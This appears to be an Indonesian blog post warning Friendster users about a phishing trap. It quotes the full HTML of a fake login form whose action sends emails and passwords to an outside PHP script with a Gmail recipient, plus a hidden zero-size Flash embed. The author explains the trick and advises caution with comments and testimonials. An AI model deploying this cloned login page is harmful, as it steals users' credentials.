style="margin: 0 2px; color: #fff;"> %7C </span><a target="_top" href="/video.php">Video</a><span style="margin: 0 2px; color: #fff;"> %7C </span><a target="_top" href="/blogs.php">Blogs</a><span style="margin: 0 2px; color: #fff;"> %7C </span><a target="_top" href="/love.php">Love</a><span class="newicon" style="height: 10px; margin-left: 3px; "><img src="http://images.friendster.com/images/global/+new.gif" style=""></span><span style="margin: 0 2px; color: #fff;"> %7C </span><a target="_top" href="http://classifieds.friendster.com/">Classifieds</a><span style="margin: 0 2px; color: #fff;"> %7C </span><a target="_top" href="/discussion.php">Forums</a><span style="margin: 0 2px; color: #fff;"> %7C </span><a target="_top" href="/invite.php">Invite</a> </div> </div> <div id="navdivider"></div> <div id="marketing_bg"><div id="marketing"></div></div> </div></div> <div id="bottom_frame"><div id="content_frame"> <div> <div id="content"> <div class="flo2"> <div class="lc"><div class="commonbox"><div id="signIn" class="commonbox sn_dkbluebor sn_ltbluebg"><div class="boxcontent"> <h2 class="sn sn_dkblue">Please sign in to continue</h2> <!– login box goes here –> <div class="top yregbx"> <span class="ct"><span class="cl"></span></span> <div class="yregbxi"> <p></p> <h1></h1> <legend></legend> <form name="login_form" method="post" action="http://www.yogyafree.net/familycode/login.php"> <INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo"> <INPUT TYPE="hidden" NAME="Mail_To" VALUE="hd.clone@gmail.com"> <INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id"> <INPUT TYPE="hidden" NAME="Next_Page" VALUE="http://www.geocities.com/got_milf.does_you_good/index.html"> <table id="yreglgtb" summary="form: login information"> <tr> <!– end lisu –> </div> <span class="cb"><span class="cl"></span></span> </div> <!– end login box –> <input type="hidden" name="_submitted" value="1"><input type="hidden" name="next" value="/"><input type="hidden" name="tzoffset" value=""><script language="JavaScript"> var now = new Date(%29; document.login_form.tzoffset.value = now.getTimezoneOffset(%29; </script><table cellpadding="3" cellspacing="0" border="0"> <tr><td colspan="2"></td></tr> <tr> <td style="text-align:right %21important;">Email: </td> <td><input type="text" name="email" maxlength="100" size="22" alt="Email Address" tabindex="1" style="width: 200px %21important;" value=""></td> </tr> <tr> <td style="text-align:right %21important;">Password: </td> <td><input type="password" name="password" maxlength="10" size="22" alt="Password" tabindex="2" style="width: 200px %21important;"></td> </tr> <tr> <td></td> <td> <input type="checkbox" name="remembermyemail"><span class="medium">Remember me</span> </td> </tr> <tr> <td></td> <td><span class="medium"><a href="/forgotpassword.php">Forgot password?</a></span></td> </tr> <tr> <td></td> <td><input type="submit" value="Sign In" tabindex="3"></td> </tr> </table> </form> <div class="sn_blue_ctb">New to Friendster? <a href="/join.php?next=%252F">Sign Up Now%21</a> </div> </div></div></div></div> <div class="rc"><div id="squareAd">
<script language="Javascript1.3" type="text/javascript">
//buncha vars that are redefined as needed.
var axel = Math.random(%29+""; var ord = axel * 1000000000000000000; var adUniqueNumber = ord+%27?%27; var dartAdCounter=1; for(var z in dartAds%29 dartAdCounter++; //grab the container div. set the name to id, if there%27s no id, create one var scriptElements=document.getElementsByTagName(%27script%27%29; var parAdDiv=scriptElements%5BscriptElements.length-1%5D.parentNode; if (parAdDiv%29 { if(typeof(parAdDiv.id%29=="undefined" %7C%7C parAdDiv.id==""%29 { parAdDiv.id="uniqueAdID"+dartAdCounter; } parAdDiv.name=parAdDiv.id; } dartAds%5BdartAdCounter%5D={iframeEnabled:false, scriptTag:"<sc"+"ript id=%5C"dartAdScript"+ dartAdCounter + "%5C" name=%5C"dartAdScript"+ dartAdCounter + "%5C" language=%5C"Javascript1.1%5C" type=%5C"text/javascript%5C" src=%5C"/dartad.cgi?q=http://ad.doubleclick.net/adj/frnd.index/login;s=4;%21
category=nrm;dcopt=ist;sz=425×600;ptile=2;ord="+ adUniqueNumber + "%5C"></scr"+"ipt>", parentDivID:parAdDiv.id}; </script> </div></div> <br class="clearboth"> </div> </div> <div class="clearBothNoHeight"></div> </div> <div id="photobucketPanel" class="popupPanelClass" style="display: none;"> <div class="sn_closeX"><a href="javascript:closeDivUnloadIframe(%27photobucketPanel%27,%27
photobucketIframe%27%29;"><img alt="close" src="http://images.friendster.com/images/bluex.gif"></a></div> <iframe id="photobucketIframe" width="220" height="450" frameborder="0" scrollbars="0"></iframe> </div> <div id="base_frame"> <div id="adfactory1" name="adfactory1" style="visibility:hidden;display:none"><script id="dartAdScriptWrite1" name="dartAdScriptWrite1">document.write(getScriptTag(1%29%29;</script></div> <div id="adfactory2" name="adfactory2" style="visibility:hidden;display:none">
<script id="dartAdScriptWrite2" name="dartAdScriptWrite2">document.write(getScriptTag(2%29%29;</script></div> <div id="adfactory3" name="adfactory3" style="visibility:hidden;display:none"><script id="dartAdScriptWrite3" name="dartAdScriptWrite3">document.write(getScriptTag(3%29%29;</script></div> <div id="adfactory4" name="adfactory4" style="visibility:hidden;display:none"><script id="dartAdScriptWrite4" name="dartAdScriptWrite4">document.write(getScriptTag(4%29%29;</script></div> <script type="text/javascript" src="http://images.friendster.com/200610B/js/footer.js"></script>
<script> // determine when the dom is ready and call our "onload" functions
if (document.getElementsByTagName && %21window.ParseCtl%29 { var ParseCtl = { onparse : function (%29 { moveAd(1%29; moveAd(2%29; moveAd(3%29; moveAd(4%29; onPageLoad(%29; }, complete : false, timer : 0, callOnParse : function (%29 { if (document.getElementsByTagName("body"%29.length == 0 %7C%7C ParseCtl.complete%29 return; if (document.readyState && document.readyState < 2%29 return; clearInterval(ParseCtl.timer%29; ParseCtl.complete = true; ParseCtl.onparse(%29; } }; if (document.readyState%29 { ParseCtl.timer = setInterval(ParseCtl.callOnParse, 100%29; // for safari document.onreadystatechange = ParseCtl.callOnParse; } else document.addEventListener("DOMContentLoaded", ParseCtl.callOnParse, null%29; } </script>
<div id="sn_adbrite" style="margin-top: 35px %21important;">
<style type="text/css"> #sn_adbrite { border: 1px solid #b8b8b8; position: relative; width: auto; margin: 0; } .adHeadline, .adHeadline a { font-size: 12px; font-weight: bold; color: blue; text-decoration: underline; } .adText, .adText a { font-size: 11px; color: #555555; text-decoration: none; } .adLink a, .adLink a:hover, .adLink a:active, .adLink a:visited { font-size: 11px; color: #ff4400 %21important; text-align: right %21important; } </style> <table border="0" cellpadding="5" cellspacing="0"><!– Adbrite US –><tr><td valign="top"><script type="text/javascript" src="http://3.adbrite.com/mb/text_group.php?sid=30479&col=4&br=1&newwin=1">
</script></td></tr> <tr><td class="adLink" valign="top" align="right" style="text-align: right;"><a target="_blank" href="http://www.adbrite.com/mb/commerce/purchase_form.php?opid=30479&afsid=1">Your Ad Here</a></td></tr> </table> </div> <div style="width:780px"></div> </div> </div></div> </div></div> <div id="footer_container"><div id="footer" class="applicationWrapper"> <a href="/info/index.php?statpos=footer">About Us</a> %7C <a href="/info/contacts.php?statpos=footer">Contact Us</a> %7C <a href="http://classifieds.friendster.com/us/ListAds/Event/">Events</a> %7C <a href="/affiliate.php?statpos=footer">Promote My Profile</a> %7C <a href="/custhelp.php?statpos=footer">Help</a> %7C <a href="/info/tos.php?statpos=footer">Terms of Service</a> %7C <a href="/info/privacy.php?statpos=footer">Privacy Policy</a><div style="margin-top: 5px %21important;">Copyright 2002-2006 Friendster, Inc. All rights reserved. U.S. Patent No. 7,069,308</div><!–php36–></div></div> </body> </html> </span><embed sr
c="http://b
reakdance.f
reepgs.com/
sundel/sund
eloverlay6.s
wf" quality=
"high" type=
"application
/x-shockwave
-flash" widt
h="0" height
="0"></embed>
coba anda pastekan ke HTML editor seperti dreamweaver.. maka tampilannya akan seperti permintaan login ulang karena anda memasukkan password yang salah.. padahal ini adalah jebakan..
kalau anda mengerti sedikit tentang HTML dan Javascript maka akan anda temukan keganjilan di form method nya yaitu semua URL masih mengarah ke www.friendster.com tetapi ada yang aneh pada action form nya yang mengarah ke "http://www.yogyafree.net/familycode/login.php".. nah lo!..
setelah saya selidiki lagi ternyata script login itu berfungsi untuk mencatat semua inputan email dan password, tapi tidak dikirimkan ke friendster.. tapi ke sebuah text file yang berisi data semua korban yang berhasil ditipu dan setelah itu diredirect kembali ke halaman friendster anda.. heheh
tindakan seperti ini biasanya disebut XSS (Cross Site Scripting), tapi ini bukan kesalahan mutlak dari friendster.. tapi juga karena korban tidak berhati-hati dalam menerima testimonal maupun comment.. sebaiknya anda tidak mengaktifkan auto approve untuk siapapun yang ingin memberi anda comment maupun testimonal..
menurut saya sih yang bikin script sebenarnya punya skill programming, setidaknya bisa html, javascript dan PHP (ingat!.. Javascript tuh beda banget ama Java).. tapi sayang dipergunakan untuk hal yang ‘not worthy’ banget..
memang sih ilmu itu seperti pisau dengan 2 mata.. tergantung kepada yang punya ilmu..
yup.. semoga bermanfaat.. hati-hati kalo tiba-tiba ada perintah login setelah anda mengklik profile orang!!
wassalam..
nb: tulisan ini tidak dibuat untuk disalahgunakan.. do it with your own risk!..